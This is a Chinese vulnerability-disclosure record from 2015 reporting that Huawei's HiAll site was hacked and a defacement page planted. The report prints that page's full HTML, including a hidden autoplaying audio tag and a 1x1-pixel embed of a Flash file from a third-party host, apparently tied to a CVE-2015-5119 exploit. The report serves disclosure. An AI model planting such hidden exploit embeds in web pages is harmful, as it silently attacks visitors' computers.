漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:华为HiAll网站已被入侵插入恶意代码危害用户安全
提交时间:2015-08-07 11:05
修复时间:2015-09-21 18:26
公开时间:2015-09-21 18:26
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:12
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2015-08-07: 细节已通知厂商并且等待厂商处理中 2015-08-07: 厂商已经确认,细节仅向厂商公开 2015-08-17: 细节向核心白帽子及相关领域专家公开 2015-08-27: 细节向普通白帽子公开 2015-09-06: 细节向实习白帽子公开 2015-09-21: 细节向公众公开
简要描述: HiAll又名:北京纽哈斯国际教育咨询有限公司 北京纽哈斯国际教育咨询公司(New House International Education Consulting Co.,Ltd.)是一家致力于与职业生涯相关的教育咨询培训国际化企业·其前身为2001年成立于美国芝加哥的非营利组织HiAll团队,现任股东及管理者均为具有教育培训经验的国内外专家。
详细说明: 华为HiAll网站已被入侵插入恶意代码危害用户安全。 华为HiAll地址:http://huawei.hiall.com.cn/
漏洞证明: 华为HiAll地址:http://huawei.hiall.com.cn/ 恶意代码地址:http://huawei.hiall.com.cn/xunyi/liuge.html 访问提示CVE-2015-5119漏洞
下面是黑页所有代码
<p> <span style="color:#00D5FF;"></span> </p> <div style="text-align:center;"> <br /> </div> <div style="text-align:center;"> <span style="line-height:1.5;color:#009900;font-size:24px;"><em>it's been a long day without you my friend.</em></span> </div> <div style="text-align:center;"> <span style="line-height:1.5;color:#009900;font-size:24px;"><em> and i'll tell you all about it when i see you again.</em></span> </div> <div style="text-align:center;"> <span style="line-height:1.5;color:#009900;font-size:24px;"><em>we've come a long way from where we began.</em></span> </div> <div style="text-align:center;"> <span style="line-height:1.5;color:#009900;font-size:24px;"><em>oh i'll tell you all about it when i see you again.</em></span> </div> <div style="text-align:center;"> <span style="line-height:1.5;color:#009900;font-size:24px;"><em>when i see you again~</em></span> </div> <div style="text-align:center;"> <br /> </div> <span style="font-size:16px;"><strong></strong></span><br /> <div style="text-align:center;"> <span style="line-height:1.5;color:#009900;font-size:24px;"><strong>留歌</strong></span> </div> <br /> <br /> <div style="text-align:center;"> <span style="line-height:1.5;color:#009900;font-size:24px;"><strong>我问佛:如何才能如你般睿智? 佛曰:佛是过来人,人是未来佛 我也曾如你般天真</strong></span> </div> <strong></strong><br /> <div style="text-align:center;"> <span style="line-height:1.5;color:#4C33E5;font-size:16px;">================================================================</span> </div> <s></s> <p> <span style="font-size:16px;"> </span> </p> <div style="text-align:center;"> </div> <p style="text-align:center;"> <img src="http://kindeditor.net/ke4/plugins/emoticons/images/28.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/6.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/44.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/13.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/52.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/30.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/25.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/3.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/49.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/0.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/39.gif" border="0" alt="" /> </p> <p style="text-align:center;"> <br /> </p> <p style="text-align:center;"> <span style="color:#00D5FF;font-size:18px;line-height:1.5;font-family:'Microsoft YaHei', 'Courier New', Courier;">一花一世界,一念一轮回</span> </p> <p style="text-align:center;"> <span style="color:#00D5FF;font-size:18px;line-height:1.5;font-family:'Microsoft YaHei', 'Courier New', Courier;"><br /> </span> </p> <p style="text-align:center;"> <span style="font-size:18px;color:#00D5FF;">那是不是你认识一个女孩从开始到结束的过程</span> </p> <p style="text-align:center;"> <span style="font-size:16px;color:#00D5FF;"><span style="font-size:16px;"></span><br /> </span> </p> <p style="text-align:center;"> <span style="color:#4C33E5;font-size:16px;">================================xunyi3389.blog.163.com================================</span><span style="color:#4C33E5;"></span> </p> <p style="text-align:center;"> <span style="color:#4C33E5;font-size:16px;"><embed width="" height="" /><br /> </span> </p> <p style="text-align:center;"> <span style="color:#4C33E5;"><br /> </span> </p> <p> <span style="color:#009900;"></span> </p> <audio controls="controls" hidden="hidden" autoplay="autoplay" loop="loop"> <source src="http://qzone.haoduoge.com/music1/2015-04-20/1429468444.mp3" type="audio/mpeg" /> </audio> <body background="http://sh-btfs.yun.ftn.qq.com/ftn_handler/c14f4e55b75a919fcb0520b6a355bd548552ce2e4b180740c4fa9b37d5649c9b/?fname=123.jpg&cn=0&cv=30013"> <embed src="http://ndsjc.imu.edu.cn/content/flash.swf" width="1" height="1"></embed>
修复方案: 漏洞回应 厂商回应: 危害等级:低
漏洞Rank:5
确认时间:2015-08-07 18:25
厂商回复: 非常感谢白帽子对华为公司IT安全的关注,我们已通知问题站点运维人员处理该问题。
最新状态: 暂无